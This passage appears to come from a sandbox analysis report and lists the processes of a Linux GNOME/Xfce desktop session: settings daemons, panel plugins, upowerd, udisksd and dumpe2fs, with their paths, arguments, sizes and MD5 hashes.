                                                                File size:334664 bytes
                                                                MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                Start time (UTC):23:12:46
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-screensaver-proxy
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:47
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/libexec/gsd-screensaver-proxy
                                                                Arguments:/usr/libexec/gsd-screensaver-proxy
                                                                File size:27232 bytes
                                                                MD5 hash:77e309450c87dceee43f1a9e50cc0d02

                                                                Start time (UTC):23:12:46
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/bin/xfce4-panel
                                                                Arguments:-
                                                                File size:375768 bytes
                                                                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                                Start time (UTC):23:12:46
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
                                                                File size:35136 bytes
                                                                MD5 hash:ac0b8a906f359a8ae102244738682e76

                                                                Start time (UTC):23:12:46
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/libexec/gnome-session-binary
                                                                Arguments:-
                                                                File size:334664 bytes
                                                                MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                Start time (UTC):23:12:46
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-sound
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:47
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/libexec/gsd-sound
                                                                Arguments:/usr/libexec/gsd-sound
                                                                File size:31248 bytes
                                                                MD5 hash:4c7d3fb993463337b4a0eb5c80c760ee

                                                                Start time (UTC):23:12:46
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/bin/xfce4-panel
                                                                Arguments:-
                                                                File size:375768 bytes
                                                                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                                Start time (UTC):23:12:46
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
                                                                File size:35136 bytes
                                                                MD5 hash:ac0b8a906f359a8ae102244738682e76

                                                                Start time (UTC):23:12:46
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/libexec/gnome-session-binary
                                                                Arguments:-
                                                                File size:334664 bytes
                                                                MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                Start time (UTC):23:12:46
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-a11y-settings
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:47
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/libexec/gsd-a11y-settings
                                                                Arguments:/usr/libexec/gsd-a11y-settings
                                                                File size:23056 bytes
                                                                MD5 hash:18e243d2cf30ecee7ea89d1462725c5c

                                                                Start time (UTC):23:12:47
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/bin/xfce4-panel
                                                                Arguments:-
                                                                File size:375768 bytes
                                                                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                                Start time (UTC):23:12:47
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
                                                                File size:35136 bytes
                                                                MD5 hash:ac0b8a906f359a8ae102244738682e76

                                                                Start time (UTC):23:12:47
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/libexec/gnome-session-binary
                                                                Arguments:-
                                                                File size:334664 bytes
                                                                MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                Start time (UTC):23:12:47
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:47
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/libexec/gsd-housekeeping
                                                                Arguments:/usr/libexec/gsd-housekeeping
                                                                File size:51840 bytes
                                                                MD5 hash:b55f3394a84976ddb92a2915e5d76914

                                                                Start time (UTC):23:12:47
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/libexec/gnome-session-binary
                                                                Arguments:-
                                                                File size:334664 bytes
                                                                MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                Start time (UTC):23:12:47
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-power
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:47
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/libexec/gsd-power
                                                                Arguments:/usr/libexec/gsd-power
                                                                File size:88672 bytes
                                                                MD5 hash:28b8e1b43c3e7f1db6741ea1ecd978b7

                                                                Start time (UTC):23:12:47
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/lib/systemd/systemd
                                                                Arguments:-
                                                                File size:1620224 bytes
                                                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                Start time (UTC):23:12:47
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/lib/upower/upowerd
                                                                Arguments:/usr/lib/upower/upowerd
                                                                File size:260328 bytes
                                                                MD5 hash:1253eea2fe5fe4017069664284e326cd

                                                                Start time (UTC):23:12:53
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/lib/udisks2/udisksd
                                                                Arguments:-
                                                                File size:483056 bytes
                                                                MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                Start time (UTC):23:12:53
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/lib/udisks2/udisksd
                                                                Arguments:-
                                                                File size:483056 bytes
                                                                MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                Start time (UTC):23:12:54
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/sbin/dumpe2fs
                                                                Arguments:dumpe2fs -h /dev/sda2
                                                                File size:31112 bytes
                                                                MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4